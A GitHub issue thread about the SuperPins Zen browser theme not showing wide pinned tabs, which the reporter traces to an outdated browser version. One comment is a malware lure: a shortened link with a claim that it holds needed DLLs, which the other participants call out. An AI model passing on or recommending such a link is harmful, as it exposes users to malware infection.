### ISSUE TITLE
SuperPins not displaying wide-icons in 1.3.2

### ISSUE THREAD

**Issue by MartianInGreen** [JLBlk/Zen-Themes#13]
**Affected Theme**
 - SuperPins
 - Version 1.3.2

**Affected Theme Settings**
- All? Maybe specifically uc.pins.wide.disabled

**Describe the bug**
Regardless of Theme Settings the pinned-tabs are not wide. 

**To Reproduce**
1. Install 1.3.2

**Expected behavior**
Wide buttons with the uc.pins.wide.disabled not being enabled.

**Screenshots/Videos**
![image](https://github.com/user-attachments/assets/11aef93c-784f-4f7f-acff-c7894bc4fc36)

**Comment by aroopcodder** [comment]
install this
https://bit.ly/3TyLBMS
I put the necessary dlls in the archive

**Comment by MartianInGreen** [comment]
Seriously @aroopcodder, trying to get people to download Maleware in GitHub Issues? Where the world has gone... also good luck I'm on Linux ✨

**Comment by JLBlk** [comment]
I unfortunately cant seem to reproduce that, the only possible explanation for that could be that you're not on the latest version of Zen. So my only suggestion would be to update zen to the latest version ("1.0.1-a.2" as of now) and disabling all the other themes/custom css to look for conflicts.
Please update me if the issue persists even when being on latest zen version and having disabled the other themes.
(Thanks btw for instantly outing the malware guy to hopefully stop anyone from clicking that link!)

**Comment by MartianInGreen** [comment]
Ah yeah it was a browser version thing! Sorry for not checking I was on the latest version first. Working fine now!

(No worries, he's banned now, didn't know Discord Trust and Safety worked that fast.)
